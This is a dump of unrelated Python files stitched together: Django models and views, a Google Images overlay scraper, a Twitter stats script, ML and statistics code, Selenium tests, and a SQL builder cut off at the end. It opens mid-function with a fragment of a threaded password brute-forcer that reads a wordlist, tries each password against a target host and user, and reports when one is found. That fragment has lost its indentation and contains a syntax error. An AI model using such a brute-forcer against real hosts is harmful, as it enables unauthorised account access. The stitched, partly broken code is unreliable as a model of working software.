            conn(host, user, password, False)
        elif 'synchronize with original prompt' in str(e):
            time.sleep(5)
            conn(host, user, password, False)
    finally:
        if release: connection_lock.release()
def main():
target_host = raw_input("Specify target host: ")
password_file = raw_input("Specify password_file: ")
user = raw_input("Specify user: ")
if target_host == None or password_file = None or user == None:
print "Please provide password file, target host and username"
exit(0)
fn = open(password_file, 'r')
for line in fn.readlines():
if Found:
print "Password Found !!! Exiting..."
exit(0)
if Fails > 5:
print "Too many socket timeouts. Exiting..."
exit(0)
connection_lock.acquire()
password = line.strip('\r').strip('\n')
print "[---] Testing: " + str(password)
t = Thread(target = conn, args = (host, user, password, True))
child = t.start()
|
import io
import os
import selenium
import time
import requests
import numpy as np
from google_images_download import google_images_download
from PIL import Image
from PIL import ImageDraw
from PIL import ImageFont
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.chrome.options import Options
def main():
    """Google-image-search a term, overlay the first downloadable hit onto
    template.jpg, caption it with the term and a username, and save the
    composite as result.jpg."""
    imagename = input("Enter image to overlay: ")
    username = input("Enter username: ")
    # Headless Chrome session for the image search.
    options = Options()
    options.add_argument("--headless")
    driver = webdriver.Chrome(options=options)
    driver.get("https://images.google.com/")
    inputBox = driver.find_element_by_name("q")
    inputBox.send_keys(imagename)
    inputBox.send_keys(Keys.RETURN)
    WebDriverWait(driver, 5).until(EC.presence_of_element_located((By.XPATH, '//*[@jsname="Q4LuWd"]')))
    images = driver.find_elements_by_xpath('//*[contains(@class, "Q4LuWd")]')
    print(len(images))
    # Click through thumbnails until one yields a full-size http URL that
    # persist_image can download; failures fall through to the next result.
    image_url = ''
    for image in images:
        image.click()
        time.sleep(3)
        # actual_image = driver.find_elements_by_xpath('//*[@class="n3VNCb"]')
        actual_images = driver.find_elements_by_xpath('//*[@jsname="HiaYvf"]')
        for actual_image in actual_images:
            if 'http' in actual_image.get_attribute('src'):
                print(actual_image.get_attribute('src'))
                image_url = actual_image.get_attribute('src')
                break
        try:
            persist_image(imagename, image_url)
            break
        except:
            pass
    # persist_image saves <imagename>.jpg, but a pre-existing .png with the
    # same name takes priority as the overlay (and keeps its alpha channel).
    img = Image.open("template.jpg")
    jpg = 0
    try:
        overlay = Image.open(imagename + ".png")
    except:
        overlay = Image.open(imagename + ".jpg")
        jpg = 1
    w, h = overlay.size
    bw, bh = img.size
    # Center-crop the overlay to a square before resizing to 350x350.
    if w < h:
        overlay = overlay.crop((0, (h - w)/2, w, (w + h)/2))
    elif w > h:
        overlay = overlay.crop(((w - h)/2, 0, (w + h)/2, h))
    overlay = overlay.resize((350, 350))
    back_im = img.copy()
    if jpg:
        back_im.paste(overlay, (630, 770))
    else:
        # PNG: use the image itself as its alpha mask.
        back_im.paste(overlay, (630, 770), overlay)
    draw = ImageDraw.Draw(back_im)
    font = ImageFont.truetype("comicsans.ttf", 250)
    W, H = font.getsize(imagename)
    draw.text(((bw-W)/2,(bh-H)/2 + 560), imagename, (255, 0, 0), font=font)
    draw.text(((bw-W)/2 + 100,(bh-H)/2 + 920), username, (0, 0, 0), font=font)
    back_im.save('result.jpg', quality=90)
    driver.close()
def persist_image(imagename, url:str):
    """Download *url* and save it as <imagename>.jpg in the current directory.

    Raises on download failure (callers such as main() catch and try the
    next candidate); save failures are only logged.
    """
    try:
        image_content = requests.get(url).content
    except Exception as e:
        print(f"ERROR - Could not download {url} - {e}")
        # BUG FIX: the original fell through here, then hit a confusing
        # NameError on the unbound image_content below. Re-raise the real
        # error instead, preserving the raise-on-failure contract callers
        # rely on.
        raise
    try:
        image_file = io.BytesIO(image_content)
        image = Image.open(image_file).convert('RGB')
        file_path = os.path.join(imagename + '.jpg')
        with open(file_path, 'wb') as f:
            image.save(f, "JPEG", quality=85)
        print(f"SUCCESS - saved {url} - as {file_path}")
    except Exception as e:
        print(f"ERROR - Could not save {url} - {e}")
# Script entry point.
if __name__ == "__main__":
    main()
|
import tweepy, credentials
import time
def status(account):
    """Print a summary of a Twitter *account*: name, bio, tweet count and
    follower/following figures, using credential slot 1."""
    creds = credentials.credentials(1)
    consumer_key = creds[0]
    consumer_secret = creds[1]
    access_token = creds[2]
    access_token_secret = creds[3]
    auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
    auth.set_access_token(access_token, access_token_secret)
    api = tweepy.API(auth)
    user = api.get_user(account)
    userInfo = user._json
    print('User: ', userInfo['name'])
    print('')
    print('Description: "', userInfo['description'], '"')
    print('')
    print('Number of tweets: ', userInfo['statuses_count'])
    print('')
    followers = int(userInfo['followers_count'])
    friends = int(userInfo['friends_count'])
    # NOTE(review): nonFollowers is following minus followers; the fallback
    # message suggests it should flag follow-backs -- confirm the intended
    # metric.
    nonFollowers = friends - followers
    if nonFollowers < 0:
        nonFollowers = 'You have not non followers'
    print('Followers: ', followers, "\nFollowing: ", friends, '\nFollow-Friends count: ', nonFollowers, '\n')
    enter = input('\n\nPress enter to go back to menu.')
|
from datetime import date, datetime
from django import forms
from django.http import HttpResponseRedirect
from django.shortcuts import render
from persona.models import PersonaModel
class PersonaForm(forms.Form):
    """Minimal person form: name and surname required, address optional."""
    nombre = forms.CharField(label='Nombre', max_length=100)
    apellido = forms.CharField(label='Apellido', max_length=100)
    direccion = forms.CharField(label='Direccion', max_length=100, required=False)
def helloWorldView(request):
    """Render the hello-world template with a greeting in the context."""
    return render(request, 'hola-mundo.html', context={'saludo': 'Hola Mundo'})
def personaView(request):
    """Display the persona form; on a valid POST, create a PersonaModel and
    redirect to /thanks. Invalid POSTs re-render the bound form."""
    if request.method == 'POST':
        form = PersonaForm(request.POST)
        if form.is_valid():
            # Use the validated/normalized values instead of raw request.POST:
            # cleaned_data supplies '' for the optional direccion field, where
            # the raw dict could raise KeyError.
            persona = {
                'nombre': form.cleaned_data['nombre'],
                'apellido': form.cleaned_data['apellido'],
                'direccion': form.cleaned_data['direccion'],
                'edad': 26,  # hard-coded placeholder -- TODO confirm source
                'fecha_nacimiento': datetime(2020, 5, 1),
            }
            PersonaModel.objects.create(**persona)
            return HttpResponseRedirect('/thanks')
    else:
        form = PersonaForm()
    return render(request, 'persona-form.html', {'form': form})
def thanksView(request):
    """Render the thanks page with the persona's first name.

    NOTE(review): always loads and mutates the persona with pk=1 (setting
    apellido to 'hernandez') regardless of which record was just created --
    looks like leftover demo code; confirm before keeping.
    """
    persona = PersonaModel.objects.get(pk=1)
    persona.apellido = 'hernandez'
    persona.save()
    context = {
        'nombre': persona.nombre
    }
    return render(request, 'thanks.html', context=context)
|
# One Distribution Inside (ODIn)
import pandas as pd
import numpy as np
import math
from KFold import KFold
from random import shuffle
def CreateHistogram(scores, thresholds):
    """Build a normalized 12-bin histogram of *scores* over 11 thresholds.

    Bin 0 holds scores <= thresholds[0]; bin i (1..10) holds scores in
    (thresholds[i-1], thresholds[i]]; bin 11 holds everything above
    thresholds[10]. Sorts *scores* in place, as before.
    """
    scores.sort()
    edges = [np.searchsorted(scores, t, side="right") for t in thresholds]
    hist = [edges[0]]
    hist += [edges[i] - edges[i - 1] for i in range(1, 11)]
    hist.append(len(scores) - edges[10])
    total = sum(hist)
    return [count / total for count in hist]
def Overflow(A, B, s):
    """Total mass by which the scaled histogram s*A exceeds B, bin-wise."""
    return sum(max(0, s * a - b) for a, b in zip(A, B))
def BestFit(A, B, overflow_limit, eps):
    """Bisect for the largest scale in [0, 1] whose overflow of A into B
    stays within scale * overflow_limit; accurate to *eps*."""
    lo = 0
    hi = 1
    while abs(hi - lo) > eps:
        mid = (lo + hi) / 2
        if Overflow(A, B, mid) <= mid * overflow_limit:
            lo = mid
        else:
            hi = mid
    return (lo + hi) / 2
def FindP(A, B, overflow_limit):
    """Estimate the proportion of distribution A inside B, discounting the
    residual overflow at the best-fit scale."""
    best = BestFit(A, B, overflow_limit, 1e-5)
    return best - Overflow(A, B, best)
def EstimateOverflowLimit(scores, thresholds, iterations=100):
    """Estimate an overflow tolerance as mean + 3*sd of the overflow between
    two random disjoint thirds of *scores* (shuffles *scores* in place)."""
    third = math.floor(len(scores) / 3)
    total = 0
    total_sq = 0
    for _ in range(iterations):
        shuffle(scores)
        hist_a = CreateHistogram(scores[:third], thresholds)
        hist_b = CreateHistogram(scores[third:2 * third], thresholds)
        overflow = Overflow(hist_a, hist_b, 1)
        total += overflow
        total_sq += overflow * overflow
    mean = total / iterations
    sd = math.sqrt((total_sq / iterations) - mean * mean)
    return mean + 3 * sd
def ODIn(data, features, labeled_info, scorer, nfolds=10):
    """One Distribution Inside (ODIn).

    Args:
        data (list): observation points (dicts of [feature]: value).
        features (list): which features to feed the scorer.
        labeled_info (str): name of the 0/1 field marking labeled points.
        scorer (callable): one-class scorer (see OCScorers.py).
        nfolds (int): folds for cross-validating the training scores.

    Returns:
        (pred_c, pred_p): predicted c and predicted p, where p is the
        proportion of positives within the UNLABELED portion of the data.
    """
    labeled = [row for row in data if row[labeled_info] == 1]
    unlabeled = [row for row in data if row[labeled_info] == 0]

    # Cross-validated scores of the labeled data against itself.
    p_scores = []
    for train_part, test_part in KFold(nfolds, labeled):
        p_scores += scorer(pd.DataFrame(train_part)[features],
                           pd.DataFrame(test_part)[features])

    # Scores of the unlabeled data against all labeled data.
    t_scores = scorer(pd.DataFrame(labeled)[features],
                      pd.DataFrame(unlabeled)[features])

    thresholds = np.percentile(p_scores, np.arange(0, 101, 10))
    overflow_limit = EstimateOverflowLimit(p_scores, thresholds)
    p = FindP(CreateHistogram(p_scores, thresholds),
              CreateHistogram(t_scores, thresholds),
              overflow_limit)
    c = max(0, min(1, len(labeled) / (p * len(unlabeled) + len(labeled))))
    return c, p
#!C:\Python27\python
# -*- coding: utf-8 -*-
'''
Created on 2016年6月20日
@author: tc
'''
import unittest,time,sys
from common_actions.commonActions import CommonActions
from common_actions.advantageRechargeActions import AdvantageActions
class advantageActions(unittest.TestCase):
def setUp(self):
self.commonActions=CommonActions()
self.adActions=AdvantageActions()
self.driver=self.commonActions.login()
def tearDown(self):
self.driver.quit()
def qtest_adRecharge001(self):
u"""优势话费充值"""
driver=self.driver
self.adActions.adRecharge(driver, 1, 0, 16, 5)
result=self.commonActions.verifyMbRecharge(driver)
print result
self.assertEqual(True, result, u'话费充值校验失败:'+sys._getframe().f_code.co_name)
driver.close()
def qtest_adRecharge002(self):
u"""优势话费充值"""
driver=self.driver
self.adActions.adRecharge(driver, 2, 0, 17, 5)
result=self.commonActions.verifyMbRecharge(driver)
print result
self.assertEqual(True, result, u'话费充值校验失败:'+sys._getframe().f_code.co_name)
driver.close()
def qtest_adRecharge003(self):
u"""优势话费充值"""
driver=self.driver
self.adActions.adRecharge(driver, 3, 0, 18, 5)
result=self.commonActions.verifyMbRecharge(driver)
print result
self.assertEqual(True, result, u'话费充值校验失败:'+sys._getframe().f_code.co_name)
driver.close()
def qtest_adRecharge004(self):
u"""优势话费充值"""
driver=self.driver
self.adActions.adRecharge(driver, 4, 0, 19, 5)
result=self.commonActions.verifyMbRecharge(driver)
print result
self.assertEqual(True, result, u'话费充值校验失败:'+sys._getframe().f_code.co_name)
driver.close()
def qtest_adRecharge005(self):
u"""优势话费充值"""
driver=self.driver
self.adActions.adRecharge(driver, 5, 0, 20, 5)
result=self.commonActions.verifyMbRecharge(driver)
print result
self.assertEqual(True, result, u'话费充值校验失败:'+sys._getframe().f_code.co_name)
driver.close()
def qtest_adRecharge006(self):
u"""优势话费充值"""
driver=self.driver
self.adActions.adRecharge(driver, 6, 0, 22, 5)
result=self.commonActions.verifyMbRecharge(driver)
print result
self.assertEqual(True, result, u'话费充值校验失败:'+sys._getframe().f_code.co_name)
driver.close()
def qtest_adRecharge007(self):
u"""优势话费充值"""
driver=self.driver
self.adActions.adRecharge(driver, 7, 0, 23, 5)
result=self.commonActions.verifyMbRecharge(driver)
print result
self.assertEqual(True, result, u'话费充值校验失败:'+sys._getframe().f_code.co_name)
driver.close()
def qtest_adRecharge008(self):
u"""优势话费充值-不是优势地区"""
driver=self.driver
info=self.adActions.disAdRecharge(driver, 8, 0)
result=self.adActions.verifyDisAdRecharge(info)
print result
self.assertEqual(True, result, u'话费充值校验失败:'+sys._getframe().f_code.co_name)
driver.close()
def qtest_adRecharge009(self):
u"""优势话费充值-不是优势地区"""
driver=self.driver
info=self.adActions.disAdRecharge(driver, 9, 0)
result=self.adActions.verifyAdRechargeErrorNum(info)
print result
self.assertEqual(True, result, u'话费充值校验失败:'+sys._getframe().f_code.co_name)
driver.close()
# Script entry point.
if __name__ == "__main__":
    #import sys;sys.argv = ['', 'Test.testName']
    unittest.main()
import pyglet
from pyglet.gl import *
window = pyglet.window.Window()
# Redraw handler: paint one triangle spanning the lower-right half of the
# window using immediate-mode OpenGL.
@window.event
def on_draw():
    # window.clear()
    glClear(GL_COLOR_BUFFER_BIT)
    glLoadIdentity()
    glBegin(GL_TRIANGLES)
    glVertex2f(0, 0) # the 3 vertex coordinates
    glVertex2f(window.width, 0)
    glVertex2f(window.width, window.height)
    glEnd()
pyglet.app.run()
|
from django.db import models
from django.contrib.auth.models import AbstractUser
# Create your models here.
class User(AbstractUser):
    # Custom user model placeholder so fields can be added later without a
    # painful migration off the default auth user.
    pass
class Product(models.Model):
    """Catalog item; price and weight drive cart totals and shipping bands."""
    product_name = models.CharField(max_length=256)
    description = models.CharField(max_length=64)
    img_url = models.CharField(max_length=128)
    price = models.DecimalField(max_digits=10, decimal_places=2)
    weight = models.DecimalField(max_digits=10, decimal_places=2)
    stock = models.IntegerField(null=False, blank=False, default=0)
    def __str__(self):
        return f"{self.product_name}: {self.description}"
class Cart(models.Model):
    """A customer's cart; the line items live in Cart_Item."""
    customer = models.ForeignKey(User, on_delete=models.CASCADE, related_name="customer_cart", null=True)
    def __str__(self):
        return f"{self.customer} Cart No. {self.id}"
class Cart_Item(models.Model):
    """One product line inside a cart."""
    cart = models.ForeignKey(Cart, on_delete=models.CASCADE, related_name="corresponding_cart")
    product = models.ForeignKey(Product, on_delete=models.CASCADE, related_name="selected_item")
    quantity = models.IntegerField(null=False, default=0)
    def computed_price(self):
        # NOTE(review): returns the line total as a string (f-string), not a
        # number -- presumably rendered directly in templates; confirm.
        return f"{self.product.price * self.quantity}"
    def computed_weight(self):
        # Line weight, also returned as a string.
        return f"{self.product.weight * self.quantity}"
    def __str__(self):
        return f"ID no. {self.id}: {self.product} x {self.quantity}"
class Shipping(models.Model):
    """Weight-banded shipping rate for parcels between min_weight and max_weight."""
    min_weight = models.FloatField()
    max_weight = models.FloatField()
    price = models.FloatField()
    def __str__(self):
        return f"Shipping Type No. {self.id}: MinWeight = {self.min_weight}, MaxWeight = {self.max_weight}, Price = {self.price}"
class Shipping_Details(models.Model):
    """A delivery-address entry tied to a user and a shipping rate bracket."""
    shipping_type = models.ForeignKey(Shipping, on_delete=models.CASCADE, related_name="shipping_reference")
    shipment_owner = models.ForeignKey(User, on_delete=models.CASCADE, related_name="user_shipment")
    full_name = models.CharField(max_length=35)
    address1 = models.CharField(max_length=35)
    # address2/address3 are optional continuation lines.
    address2 = models.CharField(max_length=35, blank=True)
    address3 = models.CharField(max_length=35, blank=True)
    city = models.CharField(max_length=35)
    state = models.CharField(max_length=35)
    country = models.CharField(max_length=35, default="Philippines")

    def __str__(self):
        return f"Shipping Detail No {self.id}:{self.full_name}"
class Job_Order(models.Model):
    """A placed order: a customer plus the address the parcel ships to."""
    customer = models.ForeignKey(User, on_delete=models.CASCADE, related_name="order_owner")
    shipping_details = models.ForeignKey(Shipping_Details, on_delete=models.CASCADE, related_name="shipping_details")

    def __str__(self):
        return f"Order No {self.id}: {self.customer}'s parcel"
class Job_Items(models.Model):
    """One product line inside a placed order (mirrors Cart_Item)."""
    order_id = models.ForeignKey(Job_Order, on_delete=models.CASCADE, related_name="respective_order")
    product = models.ForeignKey(Product, on_delete=models.CASCADE, related_name="job_product")
    quantity = models.IntegerField()

    def computed_price(self):
        """Line total (unit price x quantity), rendered as a string."""
        return f"{self.product.price * self.quantity}"

    def computed_weight(self):
        """Line weight (unit weight x quantity), rendered as a string."""
        return f"{self.product.weight * self.quantity}"

    def __str__(self):
        return f"Job Order {self.order_id}: Item No. {self.id} x {self.quantity}"
import pandas as pd
import numpy as np
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler, Normalizer
from neupy import algorithms, estimators, environment, layers, architectures
from sklearn import metrics
from sklearn.model_selection import cross_validate
from sklearn.model_selection import cross_val_predict
# Load the UCI Online News Popularity dataset.
df = pd.read_csv("OnlineNewsPopularity.csv")
headers = df.columns[0:61]
#remove recent news (less than 2 months)
df = df[df[' timedelta'] > 60]
#Conduct PCA
data=df[df.columns[2:60]]
target = df[' shares'].ravel()
# Zero-mean / unit-variance scaling of the 58 predictor columns.
data_norm = StandardScaler().fit_transform(data)
# Mixture-of-experts: three expert networks reading the same 58 inputs.
network = architectures.mixture_of_experts([
    layers.join(
        layers.Input(58),
        layers.Softmax(22),
        layers.Softmax(1),
    ),
    layers.join(
        layers.Input(58),
        layers.Relu(60),
        layers.Relu(40),
        layers.Softmax(22),
        layers.Softmax(1),
    ),
    layers.join(
        layers.Input(58),
        layers.Tanh(12),
        layers.Tanh(25),
        layers.Tanh(1),
    ),
])
# NOTE(review): bare expression — has no effect when run as a script.
network
gdnet = algorithms.Adam(network, verbose=True)
gdnet.fit(data_norm,target, epochs=500)
# 5-fold cross-validated out-of-sample predictions for every row.
predicted = cross_val_predict(gdnet, data_norm, target, cv=5)
error = estimators.rmse(target, predicted)
print("MOE RMSE = {}\n".format(error))
r2_score = metrics.r2_score(target, predicted)
print("MOE R_SCORE = {}\n".format(r2_score))
|
#!/usr/bin/python
import os
import sys
import asyncore, socket
import threading
import time
import Queue
import random
# Global flag: worker threads keep looping while this stays True (Python 2 script).
run = True
def handle_message(message):
    """Append one message line to the shared handler file."""
    outfile = '/tmp/message_handler_file'
    with open(outfile, 'a') as f:
        f.write('%s\n' % message)
    return
class Consumer(threading.Thread):
    """Drains the queue and hands each message to a short-lived worker thread."""

    # Seconds a blocking get() waits before re-checking the global `run` flag.
    __QUEUE_TIMEOUT = 5

    def __init__(self, q, *args, **kwargs):
        super(self.__class__, self).__init__(*args, **kwargs)
        self.__queue = q

    def run(self):
        global run
        while run:
            message = None
            try:
                message = self.__queue.get(block=True, timeout=self.__class__.__QUEUE_TIMEOUT)
            except Queue.Empty:
                # Timed out with nothing queued; loop to re-test `run`.
                continue
            # Daemon worker so a slow handler never blocks shutdown.
            worker = threading.Thread(target=handle_message, args=(message,))
            worker.daemon = True
            worker.start()
        print "[Thread %s] is leaving" % self.getName()
class RandomProducer(threading.Thread):
    """Pushes a random fortune message onto the queue every few seconds."""

    # Candidate messages, chosen uniformly at random.
    __MESSAGES = [
        'Caution: breathing may be hazardous to your health.',
        'Your love life will be... interesting.',
        'Always do right. This will gratify some people and astonish the rest.',
        'Always the dullness of the fool is the whetstone of the wits.',
        'Good day to deal with people in high places; particularly lonely stewardesses.',
        'It\'s lucky you\'re going so slowly, because you\'re going in the wrong direction.',
    ]

    def __init__(self, q, *args, **kwargs):
        super(self.__class__, self).__init__(*args, **kwargs)
        self.__queue = q

    @classmethod
    def get_sleep_time(c, minimum=1, maximum=5):
        """Return a random delay, in whole seconds, within [minimum, maximum]."""
        return random.randint(minimum, maximum)

    @classmethod
    def gen_message(c):
        """Pick one message uniformly at random from __MESSAGES."""
        return c.__MESSAGES[random.randint(0, len(c.__MESSAGES) - 1)]

    def run(self):
        global run
        while run:
            queue = self.__queue
            time.sleep(RandomProducer.get_sleep_time())
            try:
                m = RandomProducer.gen_message()
                queue.put(m, block=False)
            except Exception as e:
                # Best-effort: silently drop the message if put() fails.
                pass
        print "[Thread %s] is leaving" % self.getName()
def main():
    """Wire producer -> queue -> consumer and idle until Ctrl-C stops both."""
    global run
    q = Queue.Queue(maxsize=0)  # maxsize=0 means unbounded
    producer = RandomProducer(q, name='producer')
    producer.daemon = True
    producer.start()
    consumer = Consumer(q, name='consumer')
    consumer.daemon = True
    consumer.start()
    try:
        while True:
            time.sleep(60)
    except KeyboardInterrupt as e:
        # Signal both threads to exit their run loops.
        run = False
    consumer.join()
    producer.join()
    return 0
if __name__ == "__main__":
    # Run the demo until interrupted.
    main()
|
import pytest
from contextlib import ExitStack as does_not_raise
import math
class Solution:
    """Solution to the "n lockers" puzzle: after toggling lockers in multiples
    of 1..n, exactly the perfect squares remain open."""

    def get_num_open(self, n):
        """
        Given a number of lockers, n, get the number of open lockers after they have been
        cycled in multiples of 1-n.
        Only perfect squares will be left, so the answer is floor(sqrt(n)).
        :param n: Number of lockers (non-negative int)
        :return: The number left open
        """
        # math.isqrt is exact for arbitrarily large ints, whereas
        # floor(sqrt(n)) can be off by one once float precision runs out
        # (requires Python 3.8+).
        return math.isqrt(n)

    @staticmethod
    def simulate(n):
        """Brute-force check: toggle every locker and count the open ones."""
        lockers = [0] * n  # start closed
        for i in range(n):
            # Pass i toggles every (i+1)-th locker.
            for j in range(i, n, i + 1):
                lockers[j] ^= 1  # cycle
        return sum(lockers)
# Each case: (args for get_num_open, expected result, raise-expectation).
testdata = [
    ((100,), 10, does_not_raise()),
    # Cross-check the closed form against the brute-force simulation.
    ((100,), Solution.simulate(100), does_not_raise()),
    ((10,), Solution.simulate(10), does_not_raise()),
    ((1000,), Solution.simulate(1000), does_not_raise()),
    ((2491,), Solution.simulate(2491), does_not_raise()),
]
@pytest.mark.parametrize("args, res, expectation", testdata)
def test_solution(args, res, expectation):
    """The closed-form answer must match the expected/simulated count."""
    with expectation:
        s = Solution()
        assert s.get_num_open(*args) == res
if __name__ == '__main__':
    # Allow running this file directly through pytest.
    pytest.main(args=[__file__])
|
from django.db import models
from django.urls import reverse
class kind(models.Model):
    """A furniture category (many-to-many with furniture)."""
    name = models.CharField(max_length=200,help_text="enter a furniture kind: ")

    def __str__(self):
        return self.name
class furniture(models.Model):
    """A furniture item: categorised, branded, with an image and a URL slug."""
    title = models.CharField(max_length=200)
    kind = models.ManyToManyField(kind,help_text="select a kind for this furniture: ")
    brand = models.ForeignKey('Brand',on_delete=models.SET_NULL, null=True)
    pic = models.ImageField(blank = True,null=True,upload_to='furniture/%Y%m%d')
    slug = models.SlugField(max_length = 100,unique = True,null=True)

    def __str__(self):
        return self.title

    def get_absolute_url(self):
        """Canonical detail URL for this item.

        Bug fix: `reverse` was used without ever being imported in this
        module, so this method always raised NameError at runtime (now
        imported from django.urls at the top of the file).
        """
        return reverse('furniture-details', args=[self.id, self.slug])

    class Meta:
        ordering = ('title',)
        index_together = (('id', 'slug'),)
class Brand(models.Model):
    """A furniture manufacturer/brand."""
    name = models.CharField(max_length=200,help_text='enter a furniture brand: ')

    def __str__(self):
        return self.name
class furniture_detail_photos(models.Model):
    """Extra media file attached to a single furniture item."""
    furniture = models.OneToOneField('furniture',on_delete=models.CASCADE)
    file = models.FileField(upload_to='files/%Y%m%d',null=True,blank=True)

    def __str__(self):
        # Bug fix: __str__ must return a str; returning the related model
        # instance raised "TypeError: __str__ returned non-string".
        return str(self.furniture)
# Create your models here.
|
"""This file contains the helper RPCA function which calculate the rank and
sparsity of the outputs."""
import numpy as np
def get_rank(matrix, sigma):
    """Estimate the rank of 2-D `matrix` from its singular values `sigma`.

    Counts the singular values above an optimal hard threshold tau derived
    from the matrix aspect ratio.

    :param matrix: 2-D ndarray (used only for its shape).
    :param sigma: 1-D ndarray of singular values of `matrix`.
    :return: estimated rank as a built-in int.
    :raises Exception: on wrong dimensionality or NaNs in either input.
    """
    if matrix.ndim != 2:
        raise Exception('Input is not 2D. Check dimensions of input matrix')
    elif sigma.ndim != 1:
        raise Exception('Input sigma is not 1D. Check dimensions of input matrix')
    elif np.isnan(matrix).any():
        raise Exception('There are NaNs in the matrix')
    elif np.isnan(sigma).any():
        raise Exception('There are NaNs in the sigma values')
    dim_one, dim_two = matrix.shape
    # Aspect ratio beta in (0, 1]; threshold tau derived from it.
    beta = min(dim_one, dim_two)/max(dim_one, dim_two)
    win = (8*beta)/(beta + 1 + (beta**2 + 14*beta + 1)**(1/2))
    tau = (2*(beta + 1) + win)**(1/2)
    # int() keeps the return type portable: ndarray.sum() yields int32 on
    # Windows, so the old `isinstance(rank, np.int64)` guard raised there
    # even for valid input.  (Also fixed 'imput' typos in the messages.)
    return int(np.count_nonzero(sigma > tau))
def get_sparsity(matrix, tolerance=0.001):
    """Return the percentage (0-100, built-in int) of entries of 2-D
    `matrix` whose absolute value is below `tolerance`.

    :raises Exception: if `matrix` is not 2-D or contains NaNs.
    """
    if matrix.ndim != 2:
        raise Exception('Input is not 2D. Check dimensions of input matrix')
    elif np.isnan(matrix).any():
        raise Exception('There are NaNs in your matrix')
    # int(np.round(...)) already guarantees a built-in int, so the old
    # dead isinstance guard is dropped.  ('imput' typo fixed above.)
    return int(np.round(100*(abs(matrix) < tolerance).sum()/matrix.size))
def magnitude(U, V):
    """Element-wise speed sqrt(U^2 + V^2) of a two-component velocity field."""
    # Both arrays must describe the same grid.
    if U.shape != V.shape:
        raise Exception('The velocities must have the same shape')
    return np.sqrt(np.square(U) + np.square(V))
def vorticity(U, V):
    """Per-frame vorticity dv/dx - du/dy of a (rows, cols, frames) field."""
    if U.shape != V.shape:
        raise Exception('The velocities must have the same shape')
    # Unpacking enforces a 3-D input, exactly like the original loop version.
    n_rows, n_cols, n_frames = V.shape
    # np.gradient along one axis is independent of the other axes, so the
    # per-frame loop collapses into two whole-array gradients.
    dv_dx = np.gradient(V, axis=0)
    du_dy = np.gradient(U, axis=1)
    return dv_dx - du_dy
def convert_lambda(slider_value):
    """Map a UI slider position to a lambda value on a log10 scale."""
    exponent = slider_value - 1
    return 10 ** exponent
|
import numpy as np
import pandas as pd
from math import floor
import os
from gensim.models import Word2Vec
from tqdm import tqdm
import tensorflow as tf
from class_model_vari import video2seq
import sys
### prepare directory path
test_path = sys.argv[1].rstrip('/')
output_path = sys.argv[2].rstrip('/')

#### load testing data
test_data = {}
# NOTE(review): shells out to `ls`; os.listdir would be more robust.
testlist = os.popen('ls '+test_path+'/feat/').read().split()

## import testing data
print('Start loading testing data ...')
index_id = []
for index, fi in tqdm(enumerate(testlist)):
    # Bug fix: str.rstrip('.npy') strips the *character set* {., n, p, y},
    # mangling ids that end in those letters (e.g. "copy.npy" -> "co").
    # os.path.splitext removes exactly one extension.
    video_id = os.path.splitext(fi)[0]
    index_id.append(video_id)
    test_data[video_id] = np.load(test_path + '/feat/' + fi)

w2vec_model = Word2Vec.load('./dicts/w2vec.model')
dicts_size = len(w2vec_model.wv.vocab) + 1  # +1 reserves an index for padding
max_seq_length = 27
batch_size = len(test_data)

# Build the seq2seq captioning graph.
model = video2seq(dicts_size, max_seq_length, batch_size, 0.6)
model.build_model()
model.build_encoder()
model.build_decoder()

checkpoint_dir = './models/'
saver = tf.train.Saver()
init = tf.global_variables_initializer()
with tf.Session() as sess:
    sess.run(init)
    ckpt = tf.train.get_checkpoint_state(checkpoint_dir)
    saver.restore(sess, ckpt.model_checkpoint_path)
    video_in = np.array([test_data[ii] for ii in index_id])
    # Bug fix: ndarray.reshape returns a new array (it is not in-place),
    # so the result must be reassigned.
    video_in = video_in.reshape(batch_size, 80, 4096)
    model.input_test_data(video_in)
    test_index = model.run_test(sess)

# Decode index sequences to text, collapsing immediate word repetitions.
result = []
for sentence in test_index:
    cc = ''
    early_word = 'BOS'
    for indexx in sentence:
        if indexx == 2:  # index 2 marks end-of-sentence
            break
        else:
            word_now = w2vec_model.wv.index2word[int(indexx-1)]
            if word_now != early_word:
                cc = cc + ''.join(word_now) + ' '
                early_word = word_now
            else:
                pass
    result.append(cc)

import csv
out = []
for i in range(len(index_id)):
    out.append([index_id[i], result[i]])
filename = output_path
with open(filename, 'w+') as f:
    s = csv.writer(f, delimiter=',', lineterminator='\n')
    for i in range(len(out)):
        s.writerow(out[i])
print('Done')
|
import copy
from core.HqlParse import HqlParse
import re
import datetime
def convert2mysql_type(value, index):
    """Translate a Hive column type into a MySQL column type.

    Hive STRING columns become varchar(255) for the first 69 columns and
    TEXT from column 70 onward; every other type passes through unchanged.

    Bug fix: the original tested `index < 70` and `index > 70`, so a STRING
    column at exactly index 70 fell through and was emitted as the invalid
    MySQL type "STRING".

    :param value: Hive type name (case-insensitive).
    :param index: 1-based position of the column in the table.
    :return: the MySQL type name.
    """
    if value.upper() == "STRING":
        return 'varchar(255)' if index < 70 else 'TEXT'
    return value
def my_format(column_name, coumn_type, comment):
    """Render one DDL column line: ',<name><tab padding>\\t<type>\\tCOMMENT\\t<comment>'."""
    # Pad the name out to a fixed tab stop so types line up vertically.
    pad = '\t' * (6 - (len(column_name) + 1) // 4)
    return ',{0}\t{1}\tCOMMENT\t{2}'.format(column_name + pad, coumn_type, comment)
def my_format2(column_name, coumn_type, comment):
    """Render '<name><tab padding>\\t--<comment>'.

    The type argument is accepted but, as in the original, deliberately not
    included in the output.
    """
    pad = '\t' * (6 - (len(column_name) + 2) // 4)
    return '{0}\t--{1}'.format(column_name + pad, comment)
def my_format3(column):
    """Re-align one '<name> --<comment>' line on the shared tab stops."""
    pieces = column.split('--')
    column_name = pieces[0].strip()
    comment = pieces[1].strip()
    pad = '\t' * (6 - (len(column_name) + 1) // 4)
    return '{0}\t--{1}'.format(column_name + pad, comment)
class SQLBuilder(object):
    """Generates auxiliary Hive/MySQL SQL scripts (duplicate-row checks, test
    reports, DDL conversion, multi-table joins and unions) from source SQL
    parsed with HqlParse."""

    def __init__(self, sql_statement):
        # NOTE(review): the constructor ignores sql_statement; every public
        # method takes the statement again as an argument.
        self._tables = []

    # Generate a SQL script that detects row fan-out (duplicated join keys).
    def repeat_judge(self,sql_statement):
